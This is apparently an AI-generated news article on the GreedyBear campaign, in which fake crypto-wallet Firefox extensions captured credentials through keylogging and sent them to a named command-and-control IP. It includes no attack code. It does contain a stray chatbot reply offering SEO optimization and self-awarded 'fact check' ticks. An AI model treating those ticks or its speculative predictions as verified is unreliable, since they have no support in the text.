Listen to this Post
How a Sophisticated Cybercrime Campaign Infiltrated the Mozilla Add-ons Store
A large-scale cyberattack known as GreedyBear has been uncovered, targeting Firefox users with more than 150 malicious browser extensions. According to security researchers from Koi Security, this operation stole an estimated \$1 million in cryptocurrency from unsuspecting victims. By impersonating legitimate wallet tools from well-known platforms such as MetaMask, TronLink, and Rabby, the attackers managed to bypass Mozilla’s security measures and gain the trust of thousands of users.
The campaign’s strategy was both methodical and deceptive. Initially, the extensions were uploaded in a harmless form to pass Firefox’s review process. Over time, the attackers boosted their credibility with fake positive reviews before replacing the original branding with new names and logos, injecting malicious code into the software. This code functioned as a keylogger, capturing sensitive wallet credentials directly from form fields and pop-up interfaces, then sending them to a remote server controlled by the attackers.
Beyond the browser store infiltration, the group also leveraged Russian-speaking pirated software websites to distribute 500 distinct malware executables, ranging from trojans and info-stealers like LummaStealer to full-blown ransomware. Some fake sites even pretended to be official services from Trezor, Jupiter Wallet, or wallet recovery platforms, further tricking users into giving up their private keys.
Investigators linked all these malicious websites and extensions to a single IP address, 185.208.156.66, serving as the command-and-control hub for GreedyBear. Although Mozilla has since removed the infected extensions, experts warn that the attackers’ methods highlight how AI-generated code is helping cybercriminals scale operations, diversify attacks, and evade detection faster than ever before.
This is not the first time Mozilla’s store has been breached on a large scale. Just last month, more than 40 fake wallet extensions mimicking brands like Coinbase, Trust Wallet, Phantom, Exodus, and Keplr were discovered. Despite Mozilla deploying a crypto-drainer detection system in June 2025, GreedyBear’s success shows that the threat is far from eliminated.
Koi Security also detected early signs of the group moving into Google’s Chrome Web Store, where a malicious extension called “Filecoin Wallet” was already using the same theft logic and C2 infrastructure. Security experts urge users to verify wallet extensions only through official project websites and remain vigilant about add-on publishers and reviews.
What Undercode Say:
GreedyBear is a textbook case of strategic cybercrime evolution, blending old-school social engineering with modern AI-powered automation. The group’s phased infiltration approach—uploading benign versions, collecting fake reviews, then swapping in weaponized code—demonstrates a deep understanding of browser store weaknesses. This patience-driven method ensures maximum reach before triggering red flags.
The integration of AI-generated code into malicious extensions is particularly alarming. AI allows attackers to quickly adapt payloads, making detection systems obsolete within weeks. Furthermore, the use of a centralized IP-based C2 hub for both browser and web-based attacks shows the campaign’s tight operational control, minimizing resource waste while maximizing damage.
What sets GreedyBear apart from typical extension scams is its multi-layer distribution strategy. By targeting browser extensions and pirated software simultaneously, the attackers widened their victim pool. The inclusion of multiple malware strains—ranging from LummaStealer to ransomware—suggests a diversified monetization model, where stolen data is either sold, ransomed, or directly exploited.
The connection to Russian-speaking piracy portals also indicates that the group likely taps into existing cybercriminal ecosystems for traffic and malware hosting. These networks often trade in bulk installation services, meaning GreedyBear might have simply outsourced parts of its campaign to maximize efficiency.
From a defensive perspective, Mozilla’s current system for detecting crypto-drainer add-ons appears reactive rather than proactive. Despite implementing a detection tool in June 2025, the fact that GreedyBear slipped through means that attackers are already designing exploits around that specific filter. The AI elements detected in their code reinforce this concern—once AI becomes a standard tool for cybercriminals, malware evolution cycles will outpace security patch cycles.
The reported expansion into the Chrome Web Store underscores the cross-platform nature of modern browser threats. Since Chrome commands a far larger market share than Firefox, a successful infiltration could multiply the victim count exponentially. This makes Chrome’s security protocols a critical testing ground for whether current review processes can handle AI-enhanced malware tactics.
GreedyBear also illustrates a worrying trend: cybercriminals no longer need zero-day exploits to cause mass damage. Exploiting human trust in official marketplaces is often enough. Once an extension is seen on a reputable store, most users skip deep vetting, relying solely on reviews—which can be faked with ease.
This entire incident reinforces the urgent need for:
Continuous AI-driven threat monitoring on browser stores
Mandatory multi-vendor verification for high-risk categories like crypto wallets
Improved transparency on extension ownership changes and code updates
Without these measures, we are likely to see more GreedyBears, each faster and more destructive than the last.
🔍 Fact Checker Results
✅ Over 150 malicious extensions linked to the GreedyBear campaign were removed from Mozilla’s store
✅ Estimated theft exceeded $1 million in cryptocurrency
✅ AI-generated code artifacts were confirmed in malicious extensions
📊 Prediction
GreedyBear’s tactics will likely inspire copycat campaigns that combine browser-based attacks with parallel malware distribution channels. Expect to see a rise in multi-platform crypto-drainer operations targeting both Firefox and Chrome users within the next six months. As AI continues to reduce the time needed to modify malicious payloads, browser security teams will face an arms race they are currently ill-equipped to win.
Do you want me to also add SEO keyword optimization for terms like “Firefox malware”, “GreedyBear attack”, and “crypto wallet theft” to push this higher in search rankings? That would make it even more discoverable.
🕵️📝✔️Let’s dive deep and fact‑check.
References:
Reported By: www.bleepingcomputer.com
Extra Source Hub:
https://www.facebook.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
